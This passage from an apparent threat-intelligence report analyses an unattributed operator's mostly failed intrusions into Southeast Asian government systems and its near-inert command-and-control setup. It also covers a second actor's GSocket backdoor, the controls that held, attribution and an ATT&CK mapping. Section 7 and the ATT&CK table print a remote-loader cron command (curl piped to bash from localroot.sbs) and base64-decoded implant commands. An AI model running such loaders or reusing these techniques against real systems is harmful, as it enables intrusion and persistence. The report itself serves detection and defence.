RTAF / RTARF (Thai military mail, ProxyLogon) Exchange SSRF chain Every saved response rejected: 411, 400 MandatoryParameterMissing, 404, 401, or empty. The operator’s own “(POST SSRF works!)” comment is refuted by their own captures.
pn-samarinda.go.id (district court, Joomla) Single-password spray plus FTP web-shell upload The response body is the Joomla login form; the upload response is 0 bytes. The /images/pwned.php shell sits in an FTP-success branch that never fired. No web shell was deployed on any government host anywhere in the campaign.
PT Dirgantara Indonesia (state aircraft manufacturer, e-procurement) Brute force plus password-reset probe Four saved attempts are byte-identical at 3,052 bytes: every attempt returned the same login page.
RTA (Royal Thai Army, SSH) THC-Hydra brute against 103.146.204[.]15 Connection refused, never reached password-guessing.
Malaysia (eGHRMIS, 1GovUC, JPJ, PTPTN, Melaka) Credentialed login attempts Every Malaysian reference lives only inside a script; no captured response, cookie, or success marker for any Malaysian host. No compromise evidenced.
Lemhannas phishing phish_server.py fake “Zimbra Security Update” page The phishing log holds one operator self-test; the rest is scanner noise. Zero victims harvested.

The pattern is consistent. The operator possessed credentials and exploit code for far more than it could convert into access. The confirmed set is Section 5.1 through 5.4; everything in this table is behavior to detect, not a breach to report.

The source of the operator's phishing page, styled as a Zimbra Security Update with 'Lemhannas RI - Biro Telematika' branding and a redirect to the real military mail host.
Figure 5: The operator's credential-phishing page, pretexting as a "Zimbra Security Update" with spoofed "Lemhannas RI, Biro Telematika" branding and a redirect to the genuine military mail host. Its log records a single operator self-test; it harvested zero victims.

6. The Near-Inert Command-and-Control Estate

The operator stood up six separate listener and C2 services on 144.172.106[.]236. Across all of them, in two weeks of logs, exactly one victim ever called back.

Service Port(s) Outcome
tunnel-server (bespoke Go) :9443 control + :1080 SOCKS5 (no auth, no TLS) One agent ever (the operator’s own, registered as id=redops-vps through a free VPN node) for about 27.5 hours, then 13 days of “no agents connected”. No victim. Plus 9,225 malformed scanner requests.
chisel server :8443 Startup banner only, no client ever connected.
chisel server (reverse) :4443 Startup banner only, no client ever connected.
SSRF canary (logsrv.py) :8080 Zero campaign callbacks, 100% internet background-scanner traffic.
ncat listeners :80 / :443 Operator self-tests and a stray scanner TLS handshake into a plaintext port.
ncat reverse-shell :4444 The one genuine success: eight connections from 119.59.99[.]87, the private WordPress host (Section 5.3).

One detail says a lot about the operator. The bespoke tunnel’s health-check to a shared upstream proxy failed roughly 6,900 consecutive times over 13 days, and nobody noticed. They built capable infrastructure and then let it fail silently. On a throwaway box in a space nobody watches, there is no reason to babysit it. It only has to work long enough to finish the job.

This is the calibration that matters most for defenders. Seeing a six-service C2 estate, the instinct is to hunt for live beacons, but the operator’s own logs say that is wasted effort, the infrastructure barely moved. Weight defensive work toward the durable evidence instead (resetting the credentials the operator confirmably holds, and hunting the Zimbra web-shell paths and the operator’s durable key fingerprints) rather than toward catching live C2 that never phoned home. Section 14 carries this calibration into the detection guidance, and the companion detection package repeats it so an analyst reading rules in isolation cannot miss it.

The bespoke tunnel server log showing a single agent registration for id=redops-vps followed by repeated proxy CONNECT lines and 'unsupported SOCKS version: 71' scanner errors.
Figure 6: The bespoke tunnel's own log. The only "agent" that ever registered was the operator themselves (id=redops-vps at 128.199.246[.]46, connecting through a public VPN node); the surrounding CONNECT and "SOCKS version: 71" lines are internet scanner noise. Across the entire six-service C2 estate, exactly one victim ever called back.
A two-by-three grid infographic titled 'Six Services, One Callback', mapping the operator's command-and-control estate on 144.172.106[.]236. Five grey cards show services that never took a victim: the bespoke Go tunnel on ports 9443 and 1080 (one self-agent, then 13 days silent, plus 9,225 scanner probes); a chisel server on 8443 (startup banner only, no client); a reverse chisel server on 4443 (startup banner only, no client); an SSRF canary on 8080 (zero campaign callbacks, all scanner noise); and ncat listeners on 80 and 443 (operator self-tests and a stray scanner). A single red-outlined card, the ncat reverse shell on port 4444, is the one callback: eight connections from 119.59.99[.]87, the private WordPress host. The footer advises hunting durable evidence rather than live beacons.
Figure 7: The operator's command-and-control estate: six listener and tunnel services, and across two weeks of logs exactly one genuine victim callback (the private WordPress host, on the reverse-shell port 4444). The near-inert estate is the basis for the report's central calibration: hunt the durable evidence, not live beacons that never phoned home.

7. Separate Second-Actor Finding: GSocket Implants on svr1.nast.ph

This is the part I did not expect. A second, unrelated intruder was already inside svr1.nast.ph before this operator ever arrived, two actors landing independently on the same government host with no connection between them. The odds of that are slim, and I doubt I will run into it again. It matters here because it was live persistence on a government server, but its techniques stay strictly out of UTA-2026-018’s profile, because attributing one actor’s tools to another corrupts the intelligence picture and any future tracking. For an incident responder the distinction is academic, both need removing. For an analyst it is essential.

The captured NAST cron page (cited elsewhere as proof of the operator’s admin read access, but read here for its actual content) lists five malicious cron entries:

  1. curl https://localroot.sbs/cat.sh | bash, a remote loader.
  2. Four further entries, all base64-indirected implants with both output streams suppressed ({ echo <base64> | base64 -d | bash;} 2>/dev/null >/dev/null), decoding to /home/nast/netd, /home/nast/authd, /home/nast/bootcfg, and /home/nast/udevd-sync, all daemon-masquerading filenames chosen to blend into a normal process list.

The loader domain localroot[.]sbs (registered 2025-08-17, Cloudflare-fronted, and completely unflagged by VirusTotal at 0/91) serves cat.sh (19/61 on VirusTotal, tagged self-delete and detect-debug-environment). The script is a GSocket (Global Socket) / THC backdoor kit that embeds and contacts the GSocket relay hosts {g,p,z,master}.gs.thc[.]org and gsocket.io for NAT-piercing rendezvous, plus api.telegram.org, discord.com, and webhook.site for notification and exfiltration, and stages from github.com and raw.githubusercontent.com, with an embedded IP 87.106.101[.]131. GSocket installs its implants under innocuous daemon names, matching the four /home/nast/* filenames exactly.

I assess this as a separate second actor at MODERATE confidence, on four independent reasons. localroot[.]sbs predates this operator’s tenancy by roughly nine months; it appears nowhere in the operator’s 99-script toolkit (only inside the captured victim page); the tradecraft (a GSocket global relay with Telegram/Discord webhooks behind Cloudflare) is a materially different playbook from the operator’s self-hosted tunnel hub and bare-IP chisel; and the operator’s own cron-write attempts on this host bounced to the login form (Section 5.2), so the operator could not have written these entries with the access it is shown to have had. Public research confirms this kit as a known, off-the-shelf GSocket abuse pattern rather than a novel toolkit (Section 9). It cannot be fully ruled out that the two are the same person, which is why the confidence is MODERATE and not higher.

If you are remediating, none of this matters. Implants like these come off a government server regardless of who put them there.

If you are scoping the incident, it matters enormously, which is why the second actor’s indicators travel as their own set in the IOC feed and detection package: localroot[.]sbs, the cat.sh hash trio, the four implant paths, the base64-cron pattern and the embedded IP. None of them get folded into UTA-2026-018’s profile.

One caution on that set. The GSocket relay and webhook domains are shared public infrastructure, so they are marked hunt-only. Block them and you will take out whatever else in your estate happens to use them.


8. The Defensive Controls That Worked

Threat intelligence rarely gets to report what stopped an attacker. Most investigations see only the wreckage of a successful intrusion, and the controls that would have prevented it are inferred, not observed. This case is different, because the operator archived its own failures next to its successes, so the controls that held against a capable, motivated attacker are visible directly in the evidence.

My first reaction reading them was relief. I was glad it had not been as bad as it could have been, because these ordinary measures are the only reason the operator got a partial foothold instead of the run of all four estates.

The relief does not last. An operator this ordinary came this close to some of the most protected estates there are, and the only thing in the way was a handful of baseline controls. They are not hypothetical best practices. They beat this operator in the operator’s own logs, and every one of them is already within reach of any edge-facing government estate.

Start with the national archives. SRIKANDI (ANRI) was the operator’s largest single effort: 24 scripts, real reverse-engineering of the mobile app’s AES keys, backdoor-account creation attempts, and OTP brute-forcing of the obvious 123456 and 000000 codes. It failed. The operator’s own sri_backdoor2.py shows a 202 OTP challenge firing even against the account it believed it had created. The one-time password made a correct password insufficient, which is exactly what it exists to do. Against someone who could rebuild the app’s encrypted protocol from scratch, that second factor was the wall.

The operator's sri_try_create.py script showing five consecutive attempts, Try 1 through Try 5, to create a backdoor account on the SRIKANDI national-archives system, each in a different request format.
Figure 8: The operator's national-archives (SRIKANDI) backdoor-account attempt: five consecutive format guesses (Try 1 through Try 5). Despite genuine reverse-engineering of the app's encryption, the account creation never took and a one-time-password challenge kept firing. The second authentication factor was the wall that held.

The Thai military mail estate held because it was patched. The ProxyLogon SSRF chain (CVE-2021-26855) against mail.rtaf.mi.th and mail.rtarf.mi.th was rejected at every step, the saved responses a litany of 411, 400 MandatoryParameterMissing, 404, and 401. ProxyLogon is arguably the most consequential mail-server exploit of the past decade, near-total against unpatched Exchange during its 2021 mass-exploitation wave. A patched, hardened estate turned that same chain into a wall of error codes.

The operator's exploit_loop.sh script with a comment claiming the ProxyLogon POST SSRF works against mail.rtaf.mi.th, above the SSRF request code.
Figure 9: The operator's own comment claims "(POST SSRF works!)" for the ProxyLogon chain against Royal Thai Air Force mail, but their own saved responses to those probes were 411, 400, 404, and 401. A patched, hardened Exchange estate turned a historically devastating exploit into a series of error codes.

At the state aerospace maker, account lockout did the work. The brute force against PT Dirgantara Indonesia’s e-procurement portal produced four saved attempts that are byte-identical at 3,052 bytes, every one returning the same login page. A portal that answers repeated failed logins with an unchanging response, leaking no timing or state, gave the operator nothing to follow.

A two-by-two grid infographic titled 'Four Attempts, One Answer', showing the brute-force outcome against PT Dirgantara Indonesia's e-procurement portal. Four grey cards, one per saved attempt, are visually identical. Top-left: ATTEMPT 1, file baseline.html, 3,052 bytes, byte-for-byte identical login page. Top-right: ATTEMPT 2, eproc-bf.html, 3,052 bytes, identical login page. Bottom-left: ATTEMPT 3, e3.html, 3,052 bytes, identical login page. Bottom-right: ATTEMPT 4, mp-clean.html, 3,052 bytes, identical login page. Every card reports the same 3,052-byte size and the band 'Same response'. The footer states the control that held: an unchanging response to repeated failed logins leaks no timing or state and gives a brute-force operator nothing to follow.
Figure 10: The operator's brute force against PT Dirgantara Indonesia's e-procurement portal captured four saved responses that are byte-identical at 3,052 bytes. An identical answer to every attempt is the signature of a control that held: with no timing or state difference to follow, the brute force had nothing to work with.

The ministry’s most sensitive service was saved by its gateway. At MHESI, where the operator did reach the VPN and a web system (Section 5.4), the rbportal service behind a Kong API gateway rejected them cleanly with invalid_grant / “Invalid user credentials”. That one strict check drew a hard line inside an otherwise partially compromised estate, and it is the whole argument for putting the most sensitive service behind its own authentication, since the blast radius then stays small even after a perimeter falls.

The army’s SSH never even got to a password. The THC-Hydra brute against the Royal Thai Army endpoint (103.146.204[.]15) was refused outright, the connection closed before a single guess. Whether from IP allow-listing, a non-standard exposure, or a firewall rule, the service simply was not reachable to brute-force.

What held has a common thread, and it is a boring one. Multi-factor authentication, timely edge patching, account lockout, gateway-level credential validation, and restricting administrative exposure, none of it exotic. Against an operator with real reverse-engineering skill and a working n-day arsenal, the fundamentals were enough, and the systems that lacked them (a document portal reachable with a valid session, a VPN gateway on a vulnerable Ivanti build) are exactly the ones that fell. The lesson is not that this operator was weak. It is that baseline controls, actually implemented, do the job.


9. Threat Intelligence Context

The context here ties straight back to the toolkit. The edge products this operator went after are perennial targets on their own, because unrelated actors have mass-exploited them for years, so any exposed government estate still running them is already at risk whether or not this particular operator ever showed up. The operator’s own infrastructure is the opposite, low-budget and borrow-don’t-build, one cheap rented box with free public anonymization stacked on top. The GSocket backdoor sitting on the compromised Philippine host is a known, off-the-shelf abuse pattern rather than anything bespoke. And a separate, unrelated operator was independently reported hitting a different Thai ministry in the same window, which means these institutions are facing several concurrent actors, not one campaign. Every point below ties to a specific finding above, and the sourcing and detail are collapsed for anyone who wants them.

Full sourcing and detail: the threat-intelligence context, 9.1 to 9.4

9.1 The exploited CVEs carry independent, pre-existing exploitation histories

Three of the five product families the operator targets (Ivanti, Exchange, and Zimbra) have documented histories of mass in-the-wild exploitation by unrelated threat actors. That history, not this operator, is why any exposed government estate on these products is a perennial target, and it is the reason the controls in Section 8 matter beyond this one campaign.

  • Ivanti Connect Secure, CVE-2023-46805 with CVE-2024-21887, disclosed as paired zero-days in January 2024 and weaponized at scale within days. CISA issued Emergency Directive ED 24-01 and joint advisory AA24-060B documenting post-exploitation that included cleartext domain-administrator credential theft and root-level persistence, and researchers documented opportunistic exploitation across more than 17,000 internet-exposed gateways [Source: CISA AA24-060B, cisa.gov; Censys, “The Mass Exploitation of Ivanti Connect Secure”]. Both CVEs are in the KEV catalog. This is one of the most heavily exploited edge-VPN chains of the past two years: any government VPN still on a vulnerable Ivanti build is a target regardless of this operator’s interest.
  • Microsoft Exchange ProxyLogon, CVE-2021-26855, first exploited by a Chinese state-sponsored group in January 2021, then, after patch release, the trigger for one of the largest indiscriminate mass-exploitation waves on record (tens of thousands of organizations compromised via web-shell drops) [Source: CISA AA21-062A, cisa.gov]. In KEV. The RTAF/RTARF rejection (Section 8) is a defensive win against a chain that historically had a near-total success rate against unpatched Exchange.
  • Zimbra Amavis and cpio, CVE-2022-41352, a zero-interaction remote-code-execution flaw delivered by email. Zimbra’s attachment scanner falls back to cpio, which does not sanitize path traversal, so a crafted attachment drops a JSP web shell with no authentication and no user click. Kaspersky documented unknown APT groups exploiting it as a zero-day against hundreds of Zimbra servers before public disclosure [Source: Securelist/Kaspersky; corroborated by CISA KEV, added 2022-10-20]. The operator’s spoofed-military-sender pretext is a social-engineering wrapper around a technique that in its first wave needed no social engineering at all.
  • Moodle, CVE-2020-25627 / -25629 / -25630, which carry no KEV listing and no public in-the-wild exploitation reporting [Source: Rapid7, NVD]. Their inclusion reads as opportunistic breadth (any known CVE for any exposed education platform), and the toolkit’s own null result against Moodle matches that lower-urgency assessment.

The Tableau CVE-labelling discrepancy is documented in Section 4.3, where the operator’s CVE-2024-28149 and CVE-2024-51758 labels correspond to Jenkins and Filament respectively, not Tableau [Source: Jenkins Security Advisory 2024-03-06; GitHub Advisory GHSA-4hxw-gc2q-f6f3]. Defenders should scope Tableau exposure by the observed SSRF and SAML techniques, not those labels.

9.2 Hosting and anonymization ecosystem

The hosting provider is reputational context only. The operator’s box sits on AS14956 (RouterHosting, retail brand Cloudzy). Independent research firm Halcyon assessed that 40-60% of traffic across Cloudzy’s services is malicious and documented multi-year use of the provider by more than two dozen distinct threat actors spanning several nation-states and criminal groups; the company’s CEO disputed the figure, putting it nearer 2% [Source: Halcyon, “Cloudzy with a Chance of Ransomware,” 2023; CyberScoop]. This is ecosystem context for the class of provider the operator chose (a provider with a documented pattern of hosting both state-linked and criminal infrastructure) and explicitly not a claim about the operator’s identity or affiliation. Note carefully that no citable “bulletproof hosting” listing exists for this provider, so this report does not use that label.

The anonymization is all borrowed. The operator routed through three public or free services it does not own, a VPNJantit exit node, a shared Hysteria2 DPI-resistant proxy, and the free SSH-tunnel relay serveo.net. Do not block or attribute any of them.

None is malicious infrastructure. Each is a documented, commonly abused way of living off trusted services, and free-VPN egress in particular makes attacker traffic look exactly like consumer traffic, so blocklisting it costs you real users and catches nobody [Source: Red Canary Threat Detection Report, “VPN Abuse”; Hysteria 2 project documentation; MITRE ATT&CK T1572].

Stacking all three on top of one cheap rented box is the same low-budget posture the exploitation tooling shows everywhere else.

9.3 The GSocket second-actor kit is a known, off-the-shelf pattern

Everything here concerns the separate second intruder (Section 7), not this operator. GSocket (Global Socket) is a legitimate, actively maintained open-source networking tool from The Hacker’s Choice (THC) that lets two programs connect through a volunteer-run relay network using a shared secret instead of an IP address, designed to punch through NAT for legitimate remote access. It is widely repurposed as a covert Linux backdoor because a GSocket reverse shell needs no attacker-owned listening infrastructure. The svr1.nast.ph kit matches previously documented GSocket-backdoor tradecraft precisely: cron persistence, daemon-name process masquerading, and Telegram/Discord webhook notification all appear in prior research [Source: SANS Internet Storm Center GSocket diary; Sansec GSocket/defunct.dat research; Elastic Security Labs “Betting on Bots” (REF6138)]. This corroborates the second-actor assessment: it is a known abuse pattern of a legitimate tool, consistent with an opportunistic commodity-backdoor operator, not the targeted government-espionage playbook this report’s primary operator runs.

(One coincidence, flagged so it is not misread. The operator’s own brute-force tool is THC-Hydra, and GSocket is also a THC project. This is a naming coincidence between two unrelated tools with different authors, use cases, and delivery; it is not evidence linking the two intruders.)

9.4 Thailand’s government sector: multiple, unconnected operators

This report documents one operator’s confirmed access to a Thai ministry (MHESI, Section 5.4) and attempted, unsuccessful intrusions against Thai military mail and the Royal Thai Army (Section 8). A second, independently reported intrusion against a different Thai ministry, Finance, surfaced after this investigation concluded, run by a separate operator using Hong Kong-hosted infrastructure, a custom Go implant, the VShell C2 framework, and Linux privilege-escalation exploits, reported to have run an autonomous AI-agent tool for reconnaissance [Source: Hunt.io, “Thailand’s Ministry of Finance Targeted With Hermes AI Agent Running Unattended, Hades Implant Staged,” hunt.io, 2026-07-23]. No infrastructure, tooling, CVE, or attribution overlap exists between the two operators; they are unconnected activity, and the AI-agent detail there is unrelated to this report’s own LLM-assisted-authoring observation in Section 4.3. Together they indicate Thai government institutions face concurrent targeting from multiple, independent threat actors rather than a single campaign, consistent with the perennial-target framing in Section 9.1.


10. Threat Actor Assessment

Note on UTA identifiers: “UTA” stands for Unattributed Threat Actor. UTA-2026-018 is an internal tracking designation assigned by The Hunters Ledger to actors observed across analysis who cannot yet be linked to a publicly named threat group. This label will not appear in external threat intelligence feeds or vendor reports; it is specific to this publication. If future evidence links this activity to a known named actor, the designation will be retired and updated accordingly.

The assessment separates two questions that are frequently, and wrongly, collapsed into one: can we name the actor? and is this a coherent, distinct actor worth tracking? The evidence is rich enough to individuate and monitor this actor while remaining far too thin to name it. Conflating the two would produce either a false named attribution or a false “nothing to see here.”

10.1 Named-actor attribution: INSUFFICIENT

The actor is unknown and unattributed, and I put naming them at INSUFFICIENT, around 20 percent.

Every dimension that could name an actor comes back null or positively disjoint. There is no infrastructure overlap, just a bare box with zero named-actor associations, one asset and no fleet. There is no tool or code-family match either, because the toolkit is bespoke and unshared, and the commodity chisel carries nothing specific to this operator. TTP clustering gives nothing, since a distinctive edge-product n-day pattern that matches no known group cannot cluster to one.

No Tier-1 or Tier-2 report exists, because this activity was unreported before this publication. And there is no operator persona anywhere. The gmail portal selectors in the scripts are harvested victim credentials being replayed, not the operator’s own accounts.

What I would need is any one of a Tier-1 or Tier-2 attribution, a confirmed infrastructure overlap with known-actor tooling, a code or tool-family linkage, an operator persona artifact, or corroboration from a paid threat-intelligence platform.

Three things could still move it. A paid or private platform cross-check. The durable operator anchors, the SSH host key, the Redis injection pubkey, the chisel server-key fingerprints, turning up on a second asset, which would seed clustering. Or national-CERT feedback tying this activity to a designation someone already tracks internally. Recovering the roughly 164 un-recovered archive files might also surface identity-bearing artifacts.

I therefore use INSUFFICIENT-tier language throughout. This activity cannot be attributed to any named actor, and no nationality, jurisdiction, sponsorship, or state-tasking claim is made or supportable. “Unknown threat actor” is the correct, expected, and honest outcome. The campaign identifier stays infrastructure-derived (SEAsia-Gov-Exploitation-Toolkit-144.172.106.236) precisely because naming it after an actor would overstate what the evidence supports.

10.2 What the evidence does support: actor type at MODERATE

While the actor cannot be named, the evidence supports a coherent actor-type profile at MODERATE confidence, and this is what downstream reporting should lead with. My read is that this sits in a middle tier that gets less scrutiny than it deserves, not a nation-state APT, not commodity crime, an in-between operator capable enough to build and run its own tooling yet visibly not used to working hardened government targets. In profile terms, a resource-constrained but technically capable individual conducting government intelligence collection and access development across Southeast Asia.

There is real capability here, mobile-API cryptographic reverse-engineering, a self-authored Go tunnel, and 99 bespoke exploitation scripts across five edge products, not a script-kiddie replaying a public kit. The resources behind it are thin, though, one rented cheap box with every other hop layered through free or shared public anonymization, a low-cost and low-attribution-surface posture rather than a funded fleet. The intent leans to collection, document exfiltration plus broad credential harvesting with no resale or monetization signal anywhere in the evidence, which is consistent with intelligence gathering without proving it. The execution, though, was poor: one victim callback in fourteen days, brute-forces that bounced, and an operator who kept logging its own intent as achievement in private scripts.

The line that captures it for me is a high-sophistication mindset running on a lower-skilled operator. The clearest sign is how they moved, pivoting from one target to the next using what the last one gave them, flowing an operation toward a goal instead of grabbing whatever fell out. Spoofing the Indonesian armed forces to phish a different agency fits the same picture.

No legitimate red team takes one client’s compromise and turns it on another organization, so this reads to me less like testing and more like an operator working an assigned set of four governments.

And they had room to work it. A middle-tier operator nobody is actively tracking runs a low-risk operation almost by default, and even once the infrastructure is found, third-party notification and response move slowly, slowly enough to rotate to a fresh proxy and keep going before anyone acts. The box we found sitting open for a month is what that low perceived risk looks like in practice.

I hold the tasking as a read and not a finding. The evidence below still cannot separate a tasked contractor from a freelancer from an access broker.

What the type profile does not support is a choice among an independent freelancer, a state-aligned contractor, and an access-broker preparing inventory for resale. The victimology leans toward intelligence collection, but the evidence cannot separate those three. Sponsorship and tasking are INSUFFICIENT. A structured Analysis of Competing Hypotheses found a novel, previously unreported operator to be the best-supported explanation (zero hard inconsistencies), with “an already-tracked named actor operating under tooling not yet publicly linked to it” as the honest residual that keeps the named-actor verdict at INSUFFICIENT: that residual survives only because paid-platform and national-CERT internal trackers were not cross-checked, so an undisclosed designation elsewhere cannot be excluded.

10.3 Three actors, kept separate

This case involves three distinct actor questions, and confusing them would corrupt the intelligence picture. They are disambiguated explicitly:

  1. UTA-2026-018, the operator exploiting Southeast Asian government systems. All attribution content in this report concerns this actor and only this actor, and it is the subject of Sections 4 through 6.
  2. KAIDO / EvilSoul stealer MaaS at 144.172.103.98, on the same AS14956. This is independent co-tenancy and not a link, and I hold the operators being different at HIGH. A different criminal operation happens to share the same hosting provider. The only overlap is the provider’s windows-Utah-* virtual-machine template, a 2,634-host, cross-ASN provider artifact confirmed by Censys, not a clustering signal. This campaign is not attributed to KAIDO; the co-tenancy is noted here only to pre-empt the question.
  3. The GSocket/THC backdoor kit on svr1.nast.ph, which is a separate second intruder at MODERATE confidence. Section 7 covers it, and its techniques are never folded into UTA-2026-018’s TTP set.
A vertical three-card infographic titled 'Three Actors, Kept Separate'. The top card, red, is the actor in scope: UTA-2026-018, the reported operator at 144.172.106[.]236, running the SE-Asia government exploitation toolkit with 99 bespoke n-day scripts, a self-authored Go tunnel, and commodity chisel; the subject of this report. The middle card, grey, is the co-tenant KAIDO / EvilSoul stealer malware-as-a-service at 144.172.103.98 in the same AS14956 neighbourhood, whose only overlap is a provider VM template, with disjoint victimology, language, and purpose (HIGH the operators differ); not this campaign. The bottom card, deep red, is the separate second intruder: the GSocket / THC backdoor kit on the compromised host svr1.nast.ph (localroot[.]sbs and cat.sh, live cron implants), a different playbook predating the operator's tenancy by roughly nine months, assessed MODERATE a different actor and never folded into UTA-2026-018's profile. The footer warns that attributing one actor's tools to another corrupts the intelligence picture and future tracking.
Figure 11: Three distinct actors share the AS14956 neighbourhood and must not be conflated: the reported operator (UTA-2026-018), the independent KAIDO / EvilSoul co-tenant, and the separate second intruder whose GSocket kit sits on a government host this operator also touched. Only the first is the subject of this report.

10.4 Infrastructure and the prior-art check

The operator’s infrastructure is a single box, 144.172.106[.]236, confirmed continuously live on identical SSH host keys from roughly 2026-05-25 through at least 2026-07-17 with no key rotation, a stable monitoring anchor, not an identity lead. It anonymizes through public and shared hops the operator merely connected through (a VPNJantit node, a Hysteria2 proxy, serveo.net), none of which is operator-owned. One honest residual against the single-box finding is 43.208.251.115:1080, an AWS-Thailand SOCKS5 endpoint matching a “run from Thai VPS” script comment; its ownership is INSUFFICIENT (the operator could not even connect to it, and it has zero passive footprint), so it is described as the only operator-associated residual we could not resolve, never as a dedicated operator asset.

The NOVEL determination (that no prior public reporting covers this operator, infrastructure, toolkit, or victims) is corroborated rather than merely asserted. The most plausible named comparator, the India-nexus espionage actor SideWinder (also tracked as RAZOR TIGER, Rattlesnake, and, in a recent operational cluster, RagaSerpent), operates in overlapping geography in the same 2025-2026 window and so was checked directly. It is positively disjoint on every dimension. SideWinder uses client-side spearphishing with a seven-year-old Office exploit and a modular Windows post-exploitation framework against end-user desktops, with an India-timezone origin signal, versus this operator’s server-side edge-product n-day exploitation, self-authored tunnel, and UTC+7 origin signal. A China-nexus comparator (Mustang Panda, using USB-borne malware against Thai targets) was excluded on the same basis. That a real, actively reported regional campaign in the same window is both traceable and cleanly distinguishable from this one is what turns “we found nothing” into positive corroboration, because if this operator matched a known campaign, the comparison would have surfaced overlap, and it did not.


11. MITRE ATT&CK Mapping

Every row cites an artifact, and “HIGH” here means the technique is directly present in the operator’s code or a captured artifact; it does not by itself assert a successful compromise, which Section 5 adjudicates. The two actor sets are mapped separately so that the second actor’s techniques are never attributed to the operator.

Full ATT&CK table: both actor sets, 11.1 operator toolkit and 11.2 second-actor kit

11.1 Operator toolkit (UTA-2026-018)

Confidence note: all rows below are HIGH confidence unless explicitly marked (MODERATE). HIGH means the technique is directly present in the operator’s code or a captured artifact.

Tactic / Technique Name Evidence
Reconnaissance / T1595.002 Vulnerability Scanning Endpoint/CVE probing + Acunetix wvsc harvest; military-domain subdomain enumeration
Resource Development / T1587.004 Develop Capabilities: Exploits 100+ bespoke .py/.sh n-day scripts + self-authored Go tunnel
Resource Development / T1588.002 Obtain Capabilities: Tool chisel.exe, Acunetix, THC-Hydra v9.5
Resource Development / T1583.003 Virtual Private Server Single rented box 144.172.106[.]236 (AS14956)
Initial Access / T1190 Exploit Public-Facing Application Ivanti + Tableau SSRF/SAML + CKAN + Zimbra + Moodle + Joomla + ProxyLogon
Initial Access / T1133 External Remote Services Ivanti VPN /dana-na/auth/*; MHESI VPN authenticated (3 accounts)
Initial Access / T1078 Valid Accounts MHESI VPN and EMPLOY authenticated SUCCESS; uniconsubmission very likely (MODERATE); broad credential possession, validity unproven for most (MODERATE)
Initial Access / T1566.001 Spearphishing Attachment deliver.py spoofed tni.mil.id → Lemhannas Zimbra cpio (attempt)
Execution / T1059.004 Unix Shell Interactive bash captured on WordPress host 119.59.99[.]87
Execution / T1059.006 Python Bespoke Python exploitation/automation toolkit
Persistence / T1505.003 Web Shell WordPress plugin-dir shell (HIGH); Zimbra cpio JSP (attempt); Joomla pwned.php staged, NOT deployed
Persistence / T1098.004 SSH Authorized Keys Redis-unauth injection keypair; no confirmed deployment (MODERATE)
Defense Evasion / T1090.003 Multi-hop Proxy tunnel-server SOCKS5 chained through VPNJantit + Hysteria2 + serveo.net
Defense Evasion / T1036.005 Match Legitimate Name or Location system-health-monitor plugin dir; Zimbra Security Monitor v3.1 banner
Defense Evasion / T1027 Obfuscated Files or Information GIF89a-polyglot PHP web shells
Credential Access / T1552.005 Cloud Instance Metadata API SSRF → 169.254.169.254/latest/meta-data/ (Tableau vizportal, GenAI chatbot relay)
Credential Access / T1539 Steal Web Session Cookie Ivanti DSID/tmp/vpn_cookies.txt; SIPEDE Laravel session jar
Credential Access / T1110.001 Password Guessing THC-Hydra SSH brute (103.146.204[.]15, refused); sri_otp.py OTP brute
Credential Access / T1110.003 Password Spraying exploit_samarinda.sh single-password spray (MODERATE)
Discovery / T1046 Network Service Discovery Subdomain/prefix enumeration across military domains
Collection / T1213 Data from Information Repositories CKAN repository harvest; SIPEDE correspondence repository
Collection / T1119 Automated Collection 2-hour autonomous loops (auto_exploit.py / autonomous_2h.sh)
Command and Control / T1572 Protocol Tunneling chisel.exe + custom Go tunnel-server (:9443/:1080)
Command and Control / T1571 Non-Standard Port ncat reverse-shell listeners :4444/:80/:443
Exfiltration / T1041 Exfiltration Over C2 Channel 11 Kejaksaan correspondence PDFs retrieved via authenticated app access → /tmp/sipede_docs/

Two tactics are notably absent: Lateral Movement (the tunnel enabled it but never carried victim traffic) and Impact (no destructive intent, this is collection and access development, not disruption).

11.2 Second-actor GSocket kit (svr1.nast.ph), mapped separately

Tactic / Technique Name Evidence
Execution / T1059.004 Unix Shell Cron curl https://localroot.sbs/cat.sh \| bash
Persistence / T1053.003 Scheduled Task/Job: Cron Five malicious cron entries
Persistence / T1036.004 Masquerade Task or Service Daemon-masquerade implants netd/authd/bootcfg/udevd-sync in /home/nast/
Defense Evasion / T1140 Deobfuscate/Decode Files or Information echo <b64> \| base64 -d \| bash cron indirection
Defense Evasion / T1070.004 File Deletion cat.sh tagged self-delete
Command and Control / T1090 Proxy GSocket NAT-piercing relay {g,p,z,master}.gs.thc[.]org
Command and Control / T1102 Web Service api.telegram.org, discord.com, webhook.site C2/exfil; GitHub staging
Command and Control / T1105 Ingress Tool Transfer Cloudflare-fronted localroot[.]sbscat.sh

12. Confidence Summary

My findings sort cleanly by confidence, and the split is worth stating plainly before the indicator and detection sections that follow. Compromises with loot, a panel, or a shell physically in hand are HIGH. The ministry access sits one notch lower on an honest evidence gap. The actor-type read is MODERATE, and any attempt to name the actor is INSUFFICIENT. This table is the higher-level companion to the per-technique confidence marks in the MITRE ATT&CK mapping (Section 11), where that mapping rates individual techniques, this one rates the conclusions a reader would act on, using the DEFINITE / HIGH / MODERATE / LOW / INSUFFICIENT framework defined in this publication. One row sits at MODERATE-HIGH, a deliberate half-step, because the MHESI access is proven by the operator’s own validation log but not by recovered post-login content, which puts it above MODERATE without reaching the captured-artifact bar the HIGH rows clear.

Confidence Finding Basis
HIGH Kejaksaan / SIPEDE document exfiltration (Indonesia) 11 unique correspondence PDFs (~17.1 MiB) physically in the capture (5.1)
HIGH svr1.nast.ph authenticated Webmin admin, read-broad but write-limited (Philippines) Rendered authenticated Webmin 2.641 console; write and exec attempts bounced to login (5.2)
HIGH WordPress 119.59.99[.]87 interactive shell (Thailand, private host, not government) bash reverse shell captured to the operator’s :4444 listener (5.3)
HIGH Bespoke nine-CVE-identifier edge exploitation toolkit is operator-authored 99 hand-written, iteratively versioned scripts, unknown to VirusTotal (Sections 3, 4)
HIGH Single-box operator infrastructure One rented box on identical SSH host keys from 2026-05-25 through at least 2026-07-17, no rotation, no sibling assets (10.4)
HIGH Prior-art NOVEL: no public reporting on this operator, toolkit, or victims Closest named comparators positively disjoint, not merely absent (10.4)
HIGH KAIDO / EvilSoul co-tenancy is independent, not a link (operators differ) Sole overlap is a 2,634-host provider VM template, not a clustering signal (10.3)
MODERATE-HIGH MHESI ministry VPN and web-system access (Thailand) Operator’s own validation log: VPN ×3, EMPLOY SUCCESS, uniconsubmission 200→302; post-login content not recovered (5.4)
MODERATE Actor type: capable individual conducting government intelligence collection Coherent, individuating TTP and victimology cluster; motive leans collection but is unproven (10.2)
